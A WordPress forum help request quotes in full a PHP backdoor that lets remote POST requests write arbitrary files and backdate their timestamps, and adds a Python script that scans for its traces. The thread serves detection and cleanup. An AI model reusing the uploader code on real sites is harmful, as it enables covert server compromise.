Is my WordPress being hacked?
I have noticed recently that some new files are showing up in the editor area of my WordPress website.
The files have long names like:
b33959ad73c3009059ccd99f10e6e9b2.php
One is full of junk and some stuff about basedecode.
Another says only: access denied
And one has the following:
<?php $cur_dir = getcwd () . '/'; if ( isset ( $_POST['test'] ) ) { echo "Test " . "OK"; die (); } if ( isset ( $_POST['upload'] ) ) { $file_name = $_POST['fname']; $content = base64_decode ( $_POST['fcontent'] ); $home = substr ( $cur_dir, 0, stripos ( $cur_dir, '/wp-content/' ) + 1 ); $bd = $home . $file_name; echo $dir = substr ( $bd, 0, strripos ( $bd, '/' ) + 1 ); $flist = glob ("$dir*.php"); $date = filemtime ( array_pop ($flist) ); $f = fopen ( $bd, 'w' ); fputs ( $f, $content ); fclose ($f); touch ( $bd, $date ); die (); } if ( isset ( $_POST['clean'] ) ) { if ( 'cache' === strtolower ( substr ( $cur_dir, strrpos ( $cur_dir, '/', -2 ) + 1, -1 ) ) ) { $tim_file = substr ( $cur_dir, 0, strrpos ( $cur_dir, '/', -2 ) + 1 ) . $_POST['tim']; $date = filemtime ( $tim_file ); $old_tim = ''; $f = fopen ($tim_file, 'r'); while ( ($line = fgets($f)) !== false) $old_tim .= $line; fclose($f); $tim = str_ireplace ( array ( 'ereg($site, $url_info[\'host\']) == true', 'preg_match($site, $url_info[\'host\']) == true' ) , 'preg_match (\'/(?:^|\.)\' . $site . \'$/i\', $url_info[\'host\'])', $old_tim); if ($old_tim !== $tim) { $f = fopen ( $tim_file, 'w' ); fputs ( $f, $tim ); fclose ($f); @touch ( $tim_file, $date ); if ( $date !== filemtime ( $tim_file )) { unlink ( $tim_file ); $f = fopen ( $tim_file, 'w' ); fputs ( $f, $tim ); fclose ($f); @touch ( $tim_file, $date ); } echo "TimThumb updated\n"; } $cdir = glob ( $cur_dir . "*.php" ); array_map ( 'unlink', $cdir ); } die(); } ?>
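An added example, not part of the original post: a Python scan of a WordPress tree for the indicators visible in the file above (a 32-hex-character .php name, base64_decode applied to $_POST data, and touch() resetting the modification time). The names scan and demo, the one-hour skew and the sample tree are assumptions made for illustration; the ctime comparison assumes a POSIX filesystem.

```python
import os
import re
import tempfile
import time

# Filename shape from the post: 32 hex characters plus ".php".
HEX_NAME = re.compile(r"^[0-9a-f]{32}\.php$", re.I)
# Byte patterns taken from the PHP quoted in the post.
TRAITS = {
    "decodes_post_data": re.compile(rb"base64_decode\s*\(\s*\$_POST"),
    "resets_mtime": re.compile(rb"\btouch\s*\("),
}

def scan(root, skew=3600):
    """Return [(relative_path, reasons)] for PHP files matching the post's indicators."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in (f for f in files if f.lower().endswith(".php")):
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                body = fh.read(1 << 20)  # first 1 MiB is enough for these patterns
            reasons = [tag for tag, rx in TRAITS.items() if rx.search(body)]
            if HEX_NAME.match(name):
                reasons.append("hex_name")
            st = os.stat(path)
            # touch() rewrites mtime, not ctime; unpacked archives show the gap too, so it only supports other hits.
            if reasons and st.st_ctime - st.st_mtime > skew:
                reasons.append("mtime_backdated")
            if reasons:
                findings.append((os.path.relpath(path, root), sorted(reasons)))
    return sorted(findings)

def demo():
    """Scan a constructed tree: one inert marker file and one ordinary file."""
    with tempfile.TemporaryDirectory() as root:
        uploads = os.path.join(root, "wp-content", "uploads")
        os.makedirs(uploads)
        samples = {  # constructed contents, not a working script
            "b33959ad73c3009059ccd99f10e6e9b2.php":
                b"<?php $c = base64_decode ( $_POST['fcontent'] ); touch ( $bd, $date );",
            "index.php": b"<?php // Silence is golden.",
        }
        old = time.time() - 30 * 86400
        for name, body in samples.items():
            path = os.path.join(uploads, name)
            with open(path, "wb") as fh:
                fh.write(body)
            os.utime(path, (old, old))  # backdate both, as the posted touch() would
        return scan(root)
```

Because the posted file copies the modification time of a neighbouring .php file onto whatever it writes, sorting by mtime will not surface new files; the ctime gap is reported only alongside a name or content match.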
- The topic ‘Is my WordPress being hacked?’ is closed to new replies.